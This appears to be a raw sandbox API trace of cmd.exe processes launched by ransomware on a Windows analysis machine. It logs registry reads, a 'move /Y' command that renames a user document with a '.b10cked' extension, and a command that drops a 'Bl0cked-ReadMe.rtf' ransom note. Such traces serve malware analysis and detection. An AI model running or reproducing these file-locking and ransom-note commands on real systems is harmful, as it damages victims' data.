lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x40, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x40, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x0, lpData=0x16ed48*=0x40, lpcbData=0x16ed40*=0x1000) returned 0x2 [0235.027] RegCloseKey (hKey=0x40) returned 0x0 [0235.027] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ed3c | out: phkResult=0x16ed3c*=0x40) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x0, lpData=0x16ed48*=0x40, lpcbData=0x16ed40*=0x1000) returned 0x2 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x1, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x0, lpData=0x16ed48*=0x1, lpcbData=0x16ed40*=0x1000) returned 0x2 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x0, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x9, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x4, lpData=0x16ed48*=0x9, lpcbData=0x16ed40*=0x4) returned 0x0 [0235.027] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ed44, lpData=0x16ed48, lpcbData=0x16ed40*=0x1000 | out: lpType=0x16ed44*=0x0, lpData=0x16ed48*=0x9, lpcbData=0x16ed40*=0x1000) returned 0x2 [0235.027] RegCloseKey (hKey=0x40) returned 0x0 [0235.027] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0235.028] srand (_Seed=0x5b8863c2) [0235.028] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked\"" [0235.028] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked\"" [0235.028] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.028] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x341958, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0235.028] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.028] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.028] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.028] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0235.028] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0235.028] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0235.028] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0235.028] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0235.029] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0235.029] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0235.029] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0235.029] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0235.029] GetEnvironmentStringsW () returned 0x342348* [0235.029] FreeEnvironmentStringsW (penv=0x342348) returned 1 [0235.029] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.029] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.029] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0235.029] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0235.029] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0235.029] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0235.029] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0235.029] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0235.029] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0235.029] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0235.029] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16fb08 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.029] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16fb08, lpFilePart=0x16fb04 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16fb04*="Desktop") returned 0x18 [0235.029] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.029] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f884 | out: lpFindFileData=0x16f884) returned 0x3409d8 [0235.029] FindClose (in: hFindFile=0x3409d8 | out: hFindFile=0x3409d8) returned 1 [0235.030] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f884 | out: lpFindFileData=0x16f884) returned 0x3409d8 [0235.030] FindClose (in: hFindFile=0x3409d8 | out: hFindFile=0x3409d8) returned 1 [0235.030] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f884 | out: lpFindFileData=0x16f884) returned 0x3409d8 [0235.030] FindClose (in: hFindFile=0x3409d8 | out: hFindFile=0x3409d8) returned 1 [0235.030] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.030] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0235.030] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0235.030] GetEnvironmentStringsW () returned 0x3401f8* [0235.030] FreeEnvironmentStringsW (penv=0x3401f8) returned 1 [0235.030] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.031] GetConsoleOutputCP () returned 0x1b5 [0235.031] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.031] GetUserDefaultLCID () returned 0x409 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fc48, cchData=128 | out: lpLCData="0") returned 2 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fc48, cchData=128 | out: lpLCData="0") returned 2 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fc48, cchData=128 | out: lpLCData="1") returned 2 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0235.031] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0235.032] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0235.032] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0235.032] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0235.032] GetConsoleTitleW (in: lpConsoleTitle=0x330920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.032] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.033] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0235.033] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0235.033] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0235.033] _wcsicmp (_String1="move", _String2=")") returned 68 [0235.033] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0235.033] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0235.033] _wcsicmp (_String1="IF", _String2="move") returned -4 [0235.033] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0235.033] _wcsicmp (_String1="REM", _String2="move") returned 5 [0235.033] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0235.037] GetConsoleTitleW (in: lpConsoleTitle=0x16f940, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.037] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0235.037] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0235.037] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0235.037] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0235.037] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0235.037] _wcsicmp (_String1="move", _String2="CD") returned 10 [0235.037] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0235.038] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0235.038] _wcsicmp (_String1="move", _String2="REN") returned -5 [0235.038] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0235.038] _wcsicmp (_String1="move", _String2="SET") returned -6 [0235.038] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0235.038] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0235.038] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0235.038] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0235.038] _wcsicmp (_String1="move", _String2="MD") returned 11 [0235.038] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0235.038] _wcsicmp (_String1="move", _String2="RD") returned -5 [0235.038] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0235.038] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0235.038] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0235.038] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0235.038] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0235.038] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0235.038] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0235.038] _wcsicmp (_String1="move", _String2="VER") returned -9 [0235.038] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0235.038] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0235.038] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0235.038] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0235.038] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0235.038] _wcsicmp (_String1="move", _String2="START") returned -6 [0235.038] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0235.038] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0235.038] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0235.040] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.040] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0235.040] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f6fc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f6f4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f6f4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0235.040] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0235.040] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0235.040] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0235.040] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0235.041] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0235.042] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0235.042] _wcsicmp (_String1="RD4BMP~1.OTS", _String2=".") returned 68 [0235.042] _wcsicmp (_String1="RD4BMP~1.OTS", _String2="..") returned 68 [0235.042] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\rd4bmp~1.ots")) returned 0x20 [0235.042] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x341ef8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.042] SetErrorMode (uMode=0x0) returned 0x0 [0235.042] SetErrorMode (uMode=0x1) returned 0x0 [0235.042] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS", nBufferLength=0x104, lpBuffer=0x16f084, lpFilePart=0x16f06c | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS", lpFilePart=0x16f06c*="RD4BMP~1.OTS") returned 0x36 [0235.043] SetErrorMode (uMode=0x0) returned 0x1 [0235.043] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1")) returned 0x12 [0235.043] _wcsicmp (_String1="RD4BMP~1.OTS", _String2=".") returned 68 [0235.043] _wcsicmp (_String1="RD4BMP~1.OTS", _String2="..") returned 68 [0235.043] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\rd4bmp~1.ots")) returned 0x20 [0235.043] SetErrorMode (uMode=0x0) returned 0x0 [0235.043] SetErrorMode (uMode=0x1) returned 0x0 [0235.043] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS", nBufferLength=0x104, lpBuffer=0x16f500, lpFilePart=0x16f298 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS", lpFilePart=0x16f298*="RD4BMP~1.OTS") returned 0x36 [0235.043] SetErrorMode (uMode=0x0) returned 0x1 [0235.043] SetErrorMode (uMode=0x0) returned 0x0 [0235.043] SetErrorMode (uMode=0x1) returned 0x0 [0235.043] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked", nBufferLength=0x104, lpBuffer=0x16f708, lpFilePart=0x16f298 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked", lpFilePart=0x16f298*="rd4bMPAMmCyKiYpJrFwO.ots.b10cked") returned 0x4a [0235.043] SetErrorMode (uMode=0x0) returned 0x1 [0235.043] SetLastError (dwErrCode=0x0) [0235.044] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\rd4bmpammcykiypjrfwo.ots.b10cked")) returned 0xffffffff [0235.044] GetLastError () returned 0x2 [0235.044] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x16ec14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ec14) returned 0x330f70 [0235.044] FindNextFileW (in: hFindFile=0x330f70, lpFindFileData=0x16ec14 | out: lpFindFileData=0x16ec14) returned 0 [0235.044] GetLastError () returned 0x12 [0235.044] FindClose (in: hFindFile=0x330f70 | out: hFindFile=0x330f70) returned 1 [0235.045] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\RD4BMP~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x341c98, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x341c98) returned 0x330f70 [0235.046] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked", nBufferLength=0x104, lpBuffer=0x16eeac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked", lpFilePart=0x0) returned 0x4a [0235.046] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots", nBufferLength=0x104, lpBuffer=0x16eeac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots", lpFilePart=0x0) returned 0x42 [0235.046] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\rd4bmpammcykiypjrfwo.ots")) returned 0x20 [0235.046] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\rd4bmpammcykiypjrfwo.ots"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\rd4bMPAMmCyKiYpJrFwO.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\rd4bmpammcykiypjrfwo.ots.b10cked"), dwFlags=0x3) returned 1 [0235.047] FindClose (in: hFindFile=0x330f70 | out: hFindFile=0x330f70) returned 1 [0235.047] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ee60 | out: _Buffer=" 1") returned 9 [0235.047] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.047] GetFileType (hFile=0x7) returned 0x2 [0235.380] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.380] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16edec | out: lpMode=0x16edec) returned 1 [0235.380] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.380] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ee20 | out: lpConsoleScreenBufferInfo=0x16ee20) returned 1 [0235.380] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.381] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x16ee60 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.381] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16ee44, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x16ee44*=0x1a) returned 1 [0235.381] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.381] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.381] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.381] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.381] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.381] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.381] SetConsoleInputExeNameW () returned 0x1 [0235.381] GetConsoleOutputCP () returned 0x1b5 [0235.381] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.381] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.382] exit (_Code=0) Process: id = "626" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0xec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34968 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34969 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34970 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34971 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 34972 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: 